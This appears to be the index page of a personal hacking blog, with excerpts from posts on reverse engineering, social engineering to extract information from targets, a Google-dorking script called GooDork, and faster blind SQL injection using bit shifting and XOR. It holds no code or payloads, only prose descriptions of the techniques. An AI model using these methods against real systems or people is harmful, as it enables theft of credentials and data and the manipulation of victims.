Posts

Reverse Engineering : it's not all its cracked up to be

A lot of people are still bewildered by Reverse Engineering. A lot of people are still wondering what it is and how on earth they can learn to do it. This post---hopefully---will break the mysticism around Reverse Engineering.
 before I can get into it I need to answer this question:
What is Reverse Engineering?Reverse engineering is the process of discovering the technological principles of a device, object, or system through analysis of its structure, function, and operation.[1] It often involves taking something (e.g., a mechanical device, electronic component, software program, or biological, chemical, or organic matter) apart and analyzing its workings in detail to be used in maintenance, or to try to make a new device or program that does the same thing without using or simply duplicating (without understanding) the original. ---- Wikipedia   What I'm going to talk about in this post is Reverse Engineering software.

Social Engineering : Exploiting the Human

Image
Oh no its another blog post about social engineering run away! lols No! This post about the way I personally approach social engineering and the mindset one should have to be able to create new and unexpected methods of extracting information from a target.

Your goal is to get information from a target, the problem you have is that this target is not just going to hand you this information---though in some rare cases it will be this easy---. How do you get the target from a state where it doesn't want to give you this information to a state where it'll willingly hand over the information to you? I think about it in terms of 5 steps:

GooDork v2.2.1 : Custom User-Agents and More Results

Image
The new version of the GooDork is out. I've decided to give you guys a crash course in using the new features.









GooDork : Super Charging your Google Hacking

Image
I recently started work on a very exciting project called GooDork in its most basic function this python script allows you to run google dorks straight from your command line.

Though its real power lies what it allows you to do with the results from a google dork.

Bit shifting blind injection : Simplified!

Image
I've recently been investigating Blind SQL injection, and have become quite fond of the practice. I stumbled upon a new technique documented by http://h.ackack.net (see here http://h.ackack.net/faster-blind-mysql-injection-using-bit-shifting.html) that used Bit shifting to guess the bits that make up the chars of the information you are trying to extract from the database.

I then came up with a modification to the method to try and make it simpler and hopefully allow the development of an even faster method (which im still working on) . My method uses the XOR bitwise operation to simplify the output and operation of the attack.

Thought relatively simple methods, they still require a comfortable understanding of the binary number system and can be frustrating to use. The method I'm about to show you can be performed with minimal understanding of the binary number system. This is because you don't need to convert in and out of binary while performing the attack.

Creativity : The only real Hacking tool

this a post from my old blog, i wanted to add it to this one because I really enjoyed writting it :)


People use hacking tools because they believe it helps them hack, but in actual fact a lot of the times all they are doing
Is helping you, convince yourself that YOU are performing a hack.

How to shoot in the dark: Improved Blind SQLi

Image
I really like this method, i feel that it should replace the method you are currently used for blind injection if you aren't using this one!


Blind SQL injection is all about knowing how to ask the right questions. The problem is you have to ask alot of questions before finding out something useful! And we also know most of the time we are trying to find out things like passwords/password hashes, usernames or emails and these things are just simply saved as a bunch of characters in a table somewhere.

The conventional Blind injection will have you probing every character of a given, guessing every possible character in the ascii table until you manage to get the right one. Worst case this will take 127 requests per character!

But there is a a faster way, which uses the way characters are represented to guess them faster.